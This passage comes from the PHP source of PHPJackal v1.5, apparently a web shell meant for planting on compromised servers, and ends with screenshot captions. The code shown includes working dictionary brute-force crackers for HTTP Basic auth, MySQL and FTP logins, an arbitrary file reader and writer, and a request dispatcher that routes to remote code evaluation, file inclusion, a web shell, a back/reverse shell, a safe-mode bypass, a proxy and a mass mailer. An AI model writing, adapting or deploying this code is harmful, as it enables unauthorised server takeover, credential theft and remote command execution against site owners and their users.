1250 echo "<center>${t}Convertor:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Input:</td><td bgcolor=\"#666666\"><textarea rows=\"10\" name=\"input\" cols=\"64\">";if(!empty($_REQUEST['input']))echo htmlspecialchars($_REQUEST['input']);echo "</textarea></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Task:</td><td bgcolor=\"#808080\"><select size=1 name=to><option value=md5>MD5</option><option value=sha1>SHA1</option><option value=crc32>crc32</option><option value=ip2long>IP to long</option><option value=long2ip>Long to IP</option><option value=hex>HEX</option><option value=urlencode>URL encoding</option><option value=urldecode>URL decoding</option><option value=base64_encode>Base64 encoding</option><option value=base64_decode>Base64 decoding</option></select></td><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Convert></td></tr>$hcwd</form></table></center>";
1251 }
1252 function authcrackeR(){
1253 global $errorbox,$et,$t,$crack,$hcwd;
1254 if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
1255 $data='';
1256 $method=($_REQUEST['method'])?'POST':'GET';
1257 if(strstr($_REQUEST['target'],'?')){$data=substr($_REQUEST['target'],strpos($_REQUEST['target'],'?')+1);$_REQUEST['target']=substr($_REQUEST['target'],0,strpos($_REQUEST['target'],'?'));}
1258 spliturL($_REQUEST['target'],$host,$page);
1259 $type=$_REQUEST['combo'];
1260 $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
1261 if($method='GET')$page.=$data;
1262 $dictionary=fopen($_REQUEST['dictionary'],'r');
1263 echo "<font color=blue>";
1264 while(!feof($dictionary)){
1265 if($type){
1266 $combo=trim(fgets($dictionary)," \n\r");
1267 $user=substr($combo,0,strpos($combo,':'));
1268 $pass=substr($combo,strpos($combo,':')+1);
1269 }else{
1270 $pass=trim(fgets($dictionary)," \n\r");
1271 }
1272 $so=fsockopen($host,80,$en,$es,5);
1273 if(!$so){echo "$errorbox Can not connect to host$et";break;}
1274 else{
1275 $packet="$method /$page HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nConnection: Close\r\nAuthorization: Basic ".base64_encode("$user:$pass");
1276 if($method=='POST')$packet.="Content-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($data);
1277 $packet.="\r\n\r\n";
1278 $packet.=$data;
1279 fputs($so,$packet);
1280 $res=substr(fgets($so),9,2);
1281 fclose($so);
1282 if($res=='20')echo "U: $user P: $pass</br>";
1283 flusheR();
1284 }
1285 }
1286 echo "Done!</font>";
1287 }else echo "<center><form method=\"POST\" name=form>${t}HTTP Auth cracker:</td><td bgcolor=\"#333333\"><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>";
1288 }
1289 function sqlcrackeR(){
1290 global $errorbox,$t,$et,$crack;
1291 if (!function_exists("mysql_connect")){
1292 echo "$errorbox Server does n`t support MySQL$et";
1293 }
1294 else{
1295 if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
1296 $target=$_REQUEST['target'];
1297 $type=$_REQUEST['combo'];
1298 $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
1299 $dictionary=fopen($_REQUEST['dictionary'],'r');
1300 if ($dictionary){
1301 echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";
1302 while(!feof($dictionary)){
1303 if($type){
1304 $combo=trim(fgets($dictionary)," \n\r");
1305 $user=substr($combo,0,strpos($combo,':'));
1306 $pass=substr($combo,strpos($combo,':')+1);
1307 }else{
1308 $pass=trim(fgets($dictionary)," \n\r");
1309 }
1310 $sql=@mysql_connect($target,$user,$pass);
1311 if($sql){echo "U: $user P: $pass (<a href=\"".hlinK("seC=mysql&serveR=$target&useR=$user&pasS=$pass&querY=SHOW+DATABASES&workingdiR=".getcwd())."\">Connect</a>)<br>";mysql_close($sql);if(!$type)break;}
1312 flusheR();
1313 }
1314 echo "<br>Done</font>";
1315 fclose($dictionary);
1316 }
1317 else{
1318 echo "$errorbox Can not open dictionary.$et";
1319 }
1320 }
1321 else{
1322 echo "<center>${t}MySQL cracker:$crack";
1323 }
1324 }
1325 }
1326 function ftpcrackeR(){
1327 global $errorbox,$t,$et,$crack;
1328 if (!function_exists("ftp_connect"))echo "$errorbox Server does n`t support FTP functions$et";
1329 else{
1330 if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
1331 $target=$_REQUEST['target'];
1332 $type=$_REQUEST['combo'];
1333 $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
1334 $dictionary=fopen($_REQUEST['dictionary'],'r');
1335 if ($dictionary){
1336 echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";
1337 while(!feof($dictionary)){
1338 if($type){
1339 $combo=trim(fgets($dictionary)," \n\r");
1340 $user=substr($combo,0,strpos($combo,':'));
1341 $pass=substr($combo,strpos($combo,':')+1);
1342 }else{
1343 $pass=trim(fgets($dictionary)," \n\r");
1344 }
1345 if(!$ftp=ftp_connect($target,21,8)){echo "$errorbox Can not connect to server.$et";break;}
1346 if (@ftp_login($ftp,$user,$pass)){echo "U: $user P: $pass<br>";if(!$type)break;}
1347 ftp_close($ftp);
1348 flusheR();
1349 }
1350 echo "<br>Done</font>";
1351 fclose($dictionary);
1352 }
1353 else{
1354 echo "$errorbox Can not open dictionary.$et";
1355 }
1356 }
1357 else echo "<center>${t}FTP cracker:$crack";
1358 }}
1359 function openiT($name){
1360 $ext=strtolower(substr($name,strrpos($name,'.')+1));
1361 $src=array('php','php3','php4','phps','phtml','phtm','inc');
1362 if(in_array($ext,$src))highlight_file($name);
1363 else echo "<font color=blue><pre>".htmlspecialchars(file_get_contents($name))."</pre></font>";
1364 }
1365 function logouT(){
1366 setcookie('passw','',time()-10000);
1367 header('Location: '.hlinK());
1368 }
1369 ?>
1370 <html>
1371 <head>
1372 <style>body{background: #660000 scrollbar-base-color: #484848; scrollbar-arrow-color: #FFFFFF; scrollbar-track-color: #969696;font-size:16px;font-family:"Arial Narrow";}Table { font-size: 15px; } .buttons{font-family:Verdana;font-size:10pt;font-weight:normal;font-style:normal;color:#FFFFFF;background-color:#555555;border-style:solid;border-width:1px;border-color:#FFFFFF;}textarea{border: 0px #000000 solid;background: #EEEEEE;color: #000000;}input{background: #EEEEEE;border-width:1px;border-style:solid;border-color:black}select{background: #EEEEEE; border: 0px #000000 none;}</style>
1373 <meta http-equiv="Content-Language" content="en-us">
1374 <title>PHPJackal</title>
1375 </head><body text="#E2E2E2" bgcolor="#660000" link="#DCDCDC" vlink="#DCDCDC" alink="#DCDCDC">
1376 <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#282828" bgcolor="#333333" width="100%">
1377 <tr><td><a href=javascript:history.back(1)>[Back]</a> - <a href="<?php $cwd= getcwd(); echo hlinK("seC=sysinfo&workingdiR=$cwd");?>">[Info]</a> - <a href="<?php echo hlinK("seC=fm&workingdiR=$cwd");?>">[File manager]</a> - <a href="<?php echo hlinK("seC=edit&workingdiR=$cwd");?>">[Editor]</a> - <a href="<?php echo hlinK("seC=webshell&workingdiR=$cwd");?>">[Web shell]</a> - <a href="<?php echo hlinK("seC=br&workingdiR=$cwd");?>">[B/R shell]</a> - <a href="<?php echo hlinK("seC=asm&workingdiR=$cwd");?>">[Safe-mode]</a> - <a href="<?php echo hlinK("seC=mysql&workingdiR=$cwd"); ?>">[SQL]</a> - <a href="<?php echo hlinK("seC=mailer&workingdiR=$cwd"); ?>">[Mailer]</a> - <a href="<?php echo hlinK("seC=eval&workingdiR=$cwd");?>">[Evaler]</a> - <a href="<?php echo hlinK("seC=sc&workingdiR=$cwd"); ?>">[Scanners]</a> - <a href="<?php echo hlinK("seC=cr&workingdiR=$cwd");?>">[Crackers]</a> - <a href="<?php echo hlinK("seC=px&workingdiR=$cwd");?>">[Pr0xy]</a> - <a href="<?php echo hlinK("seC=whois&workingdiR=$cwd");?>">[Whois]</a> - <a href="<?php echo hlinK("seC=calc&workingdiR=$cwd");?>">[Convert]</a> - <a href="<?php echo hlinK("seC=about&workingdiR=$cwd");?>">[About]</a> <?php if(isset($_COOKIE['passw'])) echo "- [<a href=\"".hlinK("seC=logout")."\">Logout</a>]";?></td></tr></table>
1378 <hr size=1 noshade>
1379 <?php
1380 if (!empty($_REQUEST['seC'])){
1381 switch($_REQUEST['seC']){
1382 case 'fm':filemanager();break;
1383 case 'sc':scanneR();break;
1384 case 'phpinfo': phpinfo();break;
1385 case 'edit': if (!empty($_REQUEST['open']))editoR($_REQUEST['filE']);
1386 if (!empty($_REQUEST['Save'])){
1387 $filehandle= fopen($_REQUEST['file'],"w");
1388 fwrite($filehandle,$_REQUEST['edited']);
1389 fclose($filehandle);}
1390 if (!empty($_REQUEST['filE'])) editoR($_REQUEST['filE']);else editoR('');
1391 break;
1392 case 'openit':openiT($_REQUEST['namE']);break;
1393 case 'cr': crackeR();break;
1394 case 'dic':dicmakeR();break;
1395 case 'whois':whoiS();break;
1396 case 'hex':hexvieW();break;
1397 case 'img':showimagE($_REQUEST['filE']);break;
1398 case 'inc':include ($_REQUEST['filE']);break;
1399 case 'hc':hashcrackeR();break;
1400 case 'fcr':formcrackeR();break;
1401 case 'snmp':snmpcrackeR();break;
1402 case 'sql':sqlcrackeR();break;
1403 case 'auth':authcrackeR();break;
1404 case 'pop3':pop3crackeR();break;
1405 case 'imap':imapcrackeR();break;
1406 case 'smtp':smtpcrackeR();break;
1407 case 'ftp':ftpcrackeR();break;
1408 case 'eval':phpevaL();break;
1409 case 'px':pr0xy();break;
1410 case 'webshell':webshelL();break;
1411 case 'mailer':maileR();break;
1412 case 'br':brshelL();break;
1413 case 'asm':safemodE();break;
1414 case 'mysql':mysqlclienT();break;
1415 case 'calc':calC();break;
1416 case 'sysinfo':sysinfO();break;
1417 case 'checksum':checksuM($_REQUEST['filE']);break;
1418 case 'logout':logouT();break;
1419 default: echo $intro;
1420 }}else echo $intro;
1421 echo $footer;?></body></html>

PHPJackal v1.5 Shell screenshot

PHPJackal v1.5 Shell screenshot

PHPJackal v1.5 Shell screenshot